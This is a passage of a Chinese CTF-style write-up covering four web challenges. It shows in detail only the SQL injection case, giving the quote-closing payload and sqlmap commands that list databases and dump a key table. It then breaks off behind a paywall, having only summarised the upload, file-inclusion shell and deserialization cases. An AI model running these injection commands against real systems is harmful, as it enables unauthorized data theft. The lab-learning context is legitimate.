本文详细介绍了四个常见的Web安全问题:34071涉及SQL注入,通过闭合语句和使用sqlmap工具获取关键信息;34072讲解了文件上传漏洞,利用Burpsuite测试并绕过关键字过滤;34073讨论了文件包含漏洞,利用data伪协议创建远程shell;最后,34074提到了反序列化漏洞,通过构造特定序列化字符串获取key。这些案例展示了Web安全攻防的重要性和技巧。
一、34071(sql注入)
1、get型,首先想办法闭合语句:
(1)从代码中可以看出,--、#及其url转义均被屏蔽
(2)前面加1',结尾加or '1, 来闭合语句:
2、语句成功闭合,使用sqlmap进行sql注入:
(1)查询数据库:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" --dbs -batch
查询到“2web”和“information_schema”两个数据库
(2)查询2web数据库中的表:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" -D 2web --tables -batch
成功查询到“Article”和"IS_KEY"两个表,显然key大概率在is_key表里
(3)查询表格“IS_KEY”:
python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" -D 2web --tables -T IS_KEY --dump -batch
成功拿到key:
二、34072 (文件上传)
1、尝试上传.php文件失败
最低0.47元/天 解锁文章
扫一扫
2169
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
